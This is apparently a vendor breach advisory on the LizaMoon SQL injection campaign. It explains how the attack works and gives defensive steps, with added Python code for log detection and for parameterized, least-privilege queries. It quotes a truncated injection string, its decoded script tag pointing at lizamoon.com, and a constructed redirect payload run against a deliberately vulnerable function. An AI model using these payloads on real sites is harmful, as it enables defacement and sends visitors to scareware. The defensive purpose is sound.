Breach Advisory: LizaMoon SQL Injection Attack (Team Shatter Exclusive)

Over the past week, web security experts have been tracking a widespread SQL injection attack known as LizaMoon, named after the domain of one of the various sites hosting a browser-redirection payload. Most notably, content on iTunes was found to contain the injected link.

The LizaMoon attack infects web sites by injecting SQL that updates text columns in the backend database; the content of those columns is used to build the pages served by the web server. The injected content redirects visitors to a rogue AV vendor website that tries to install “scareware.” Once redirected, visitors are shown fake warning screens and prompted to purchase and download bogus antivirus software.

What does LizaMoon look like?

The LizaMoon SQL injection attack code varies with the website it is attacking. For example:

news.aspx?id=281'+update+Tbl_Answers+set+AnswerText=REPLACE(cast(AnswerText+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bc……

Others are very similar. The ASCII codes in the char(..) calls decode to “</title><script src=http://lizamoon.com/ur.php></script>” or similar: each char(n) yields one character, and the %2B sequences are the URL encoding of the + operator that T-SQL uses to concatenate them, which lets the payload avoid quote characters that simple filters look for.
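As an added illustration (not part of the original advisory, and not TeamSHATTER's tooling), the following Python script decodes the char()-concatenation trick and flags request lines that carry it, the kind of check a web-log review or a database activity monitoring rule could apply. The access-log lines are constructed for the example, and the regular expressions and the "markup or DML" criterion are my own choices.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format). The second line
# carries a request shaped like the LizaMoon payload quoted above; the third is
# a benign request that merely mentions char(60), included to show the check
# does not fire on a lone char() call.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Mar/2011:10:12:01 +0000] "GET /news.aspx?id=281 HTTP/1.1" 200 5120
10.0.0.9 - - [31/Mar/2011:10:12:07 +0000] "GET /news.aspx?id=281'+update+Tbl_Answers+set+AnswerText=REPLACE(cast(AnswerText+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)+as+varchar(8000)),'') HTTP/1.1" 200 5120
10.0.0.7 - - [31/Mar/2011:10:13:00 +0000] "GET /faq.aspx?q=what+is+char(60) HTTP/1.1" 200 2048
"""

# Request target inside the quoted request line.
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
# A run of char(N) calls joined by '+' (T-SQL string concatenation). The query
# string is URL-decoded first, so the %2B seen in the log has become '+'.
CHAR_CHAIN = re.compile(r"char\(\d+\)(?:\s*\+\s*char\(\d+\))*", re.IGNORECASE)
CHAR_CODE = re.compile(r"char\((\d+)\)", re.IGNORECASE)
# Data-modifying statements appended after the expected parameter value.
DML = re.compile(r"\b(update\s+\w+\s+set|insert\s+into|delete\s+from)\b", re.IGNORECASE)


def decode_char_chain(chain):
    """Turn 'char(60)+char(47)+...' into the string it builds."""
    return "".join(chr(int(code)) for code in CHAR_CODE.findall(chain))


def analyse_request(target):
    """Return a finding for a suspicious request target, or None if it looks benign."""
    path, _, query = target.partition("?")
    query = unquote_plus(query)
    decoded = [decode_char_chain(m.group(0)) for m in CHAR_CHAIN.finditer(query)]
    # Only chains that rebuild markup (a closing tag or <script>) count; a single
    # char() in ordinary text is not evidence of an attack.
    markup = [d for d in decoded if "</" in d or "<script" in d.lower()]
    dml = DML.search(query)
    if not markup and not dml:
        return None
    return {"path": path, "dml": dml.group(0) if dml else None, "decoded": markup}


def scan_log(text):
    """Run analyse_request over every request line and collect the findings."""
    findings = []
    for line in text.splitlines():
        match = REQUEST.search(line)
        if match:
            finding = analyse_request(match.group(1))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Decoding the chain before matching is the point: a signature for the literal string "<script" never sees it in the raw request, while the decoded form and the trailing "update ... set" together make the intent unambiguous.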

Which databases are affected?

So far, LizaMoon appears to be focused on web applications developed in ASP and ASP.NET and has only affected SQL Server installations. However, other database platforms and web development frameworks are just as vulnerable to this type of attack. Recently, web sites belonging to Oracle’s Sun and MySQL subsidiaries were infected, exposing database names and email addresses.

What is the impact?

As currently implemented: Continued research by web security experts and AppSec’s TeamSHATTER database vulnerability research team has found that the LizaMoon attack is largely ineffective. Most of the domains the attack redirects traffic to are not functioning. The way the attack inserts a JavaScript snippet to redirect site visitors is also not very effective: most affected web pages analyzed by TeamSHATTER showed raw HTML containing the http://lizamoon.com/ur.php redirect displayed as text inside text boxes, and very few were actual clickable links.

Potential for Future Attacks: Despite the limited impact of the LizaMoon SQL injection attack, we should not forget that:

  1. The LizaMoon attack was of a large scale. The attack infected a million+ sites.
  2. The concepts the attack employs are easily applicable to other, more serious attacks. More sophisticated, organized and well-funded criminals and state agencies are capable of inflicting devastating damage.
  3. The attacks can reach the database layer where sensitive data resides. The same kinds of attacks could be used against the website and host, the host’s OS, and other computers on the same network. They can be used to install Trojans and viruses, harvest data, and so on. Because some of those users, applications and computers have access to the databases, large-scale credit card thefts and breaches of other highly sensitive data are possible.

How can I ensure that my organization is protected?

There is no specific workaround for the database component of this threat beyond employing best practices. For existing Application Security customers, DbProtect’s capabilities address steps 2, 3 and 4 below.

LizaMoon is a case study in poor coding and database configuration practices.  When web applications are written correctly and their backend databases are managed against vulnerabilities, SQL injections are proactively prevented.  AppSec recommends that organizations take the following steps to protect their site visitors, web applications and database assets:

  1. First and foremost, web applications should be reviewed to ensure proper input validation of web form fields and URL parameters. Queries to the backend database, especially SELECT, INSERT and UPDATE statements, should never be built by simply concatenating a SQL string with input from web form fields. The input should be sanitized, and parameterized queries should then be used to interact with the database.
  2. Harden your database. Unpatched database vulnerabilities can be exploited through SQL injection to give an attacker elevated privileges and access to sensitive data. For example, insecure configurations can allow an attacker to execute OS commands through xp_cmdshell, providing full access to database assets. A program of database vulnerability assessment and rights management should be considered a high priority.
  3. Next, enforce proper separation of duties for the web application accounts used to connect to the backend database. Unauthenticated visitors should have only ‘read only’ access to the database backend, and only administrators or content managers should be given insert or update privileges on the backend tables used to serve pages. User rights management tools should be used to enforce minimal privileges.
  4. Finally, monitor your database traffic. A properly configured database activity monitoring solution will help detect malicious SQL, and the fine-grained audit trail it produces will also greatly help the forensic analysis needed to reconstruct events in the aftermath of an attack.
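To make steps 1 and 3 concrete, here is an added Python example (mine, not AppSec’s and not code from the original advisory) that runs a LizaMoon-style UPDATE through a concatenated query, then through a validated parameterized query, and finally through the concatenated query again on a read-only connection. SQLite stands in for SQL Server: the schema, the payload and the redirect host are constructed for the example, executescript() emulates SQL Server’s batch execution of several statements in one request, and PRAGMA query_only stands in for a database login that holds SELECT rights only.

```python
import sqlite3

# Constructed schema modelled on the table and column names in the LizaMoon
# payload (Tbl_Answers / AnswerText). SQLite stands in for SQL Server here.
SCHEMA = """
CREATE TABLE News (id INTEGER PRIMARY KEY, title TEXT);
CREATE TABLE Tbl_Answers (AnswerID INTEGER PRIMARY KEY, AnswerText TEXT);
INSERT INTO News VALUES (281, 'Quarterly results');
INSERT INTO Tbl_Answers VALUES (1, '<title>FAQ</title>Our answer');
"""

# Constructed stand-in for the injected parameter value: a second statement
# riding on the id. The redirect host is a placeholder, not the real one.
PAYLOAD = ("281; UPDATE Tbl_Answers SET AnswerText = replace(AnswerText, '</title>', "
           "'</title><script src=http://redirect.example/ur.php></script>')")


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def answer_text(conn):
    """Stored content that the web server would later render into a page."""
    return conn.execute("SELECT AnswerText FROM Tbl_Answers WHERE AnswerID = 1").fetchone()[0]


def render_news_vulnerable(conn, raw_id):
    """The anti-pattern from step 1: the request parameter is spliced into the SQL text.
    SQL Server runs every statement in the batch, so an injected UPDATE executes
    alongside the SELECT. SQLite's execute() refuses multi-statement strings, so
    executescript() is used to emulate that batch behaviour (it discards result rows)."""
    sql = "SELECT title FROM News WHERE id = " + raw_id
    conn.executescript(sql)


def render_news_safe(conn, raw_id):
    """Validate, then bind: the value is never parsed as SQL."""
    try:
        news_id = int(raw_id)        # the parameter is an integer id, nothing else
    except ValueError:
        return None                  # reject rather than guess
    row = conn.execute("SELECT title FROM News WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else None


def demo():
    """Exercise the three configurations and report what happened to the stored content."""
    results = {}

    # 1. Concatenated SQL on a read-write account: the stored page content is altered.
    conn = fresh_db()
    render_news_vulnerable(conn, PAYLOAD)
    results["vulnerable_defaced"] = "<script" in answer_text(conn)

    # 2. Validated, parameterized query: the same input is rejected and nothing changes.
    conn = fresh_db()
    results["safe_result"] = render_news_safe(conn, PAYLOAD)
    results["safe_defaced"] = "<script" in answer_text(conn)
    results["safe_legit"] = render_news_safe(conn, "281")

    # 3. Step 3, least privilege: the vulnerable code still runs, but the account
    #    serving anonymous visitors is read-only (PRAGMA query_only is SQLite's
    #    stand-in for a SELECT-only login), so the injected UPDATE is refused.
    conn = fresh_db()
    conn.execute("PRAGMA query_only = 1")
    try:
        render_news_vulnerable(conn, PAYLOAD)
        results["readonly_blocked"] = False
    except sqlite3.OperationalError:
        results["readonly_blocked"] = True
    results["readonly_defaced"] = "<script" in answer_text(conn)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The third run is the defense-in-depth point: the coding defect is still there, but a visitor-facing account without UPDATE rights turns a mass defacement into a database error that the activity monitoring from step 4 can alert on.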

Each of these steps incorporated into a defense in depth strategy will protect your data assets and IT infrastructure from SQL injection attacks.

How can I learn more?

Application Security and TeamSHATTER are hosting a special webinar to help organizations address the LizaMoon SQL Injection threat this Thursday.

Links:
Visit Google and search for  “<script src=http://*/ur.php” to see a list of affected sites

Application Security, Inc.’s database security solutions have helped over 2000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
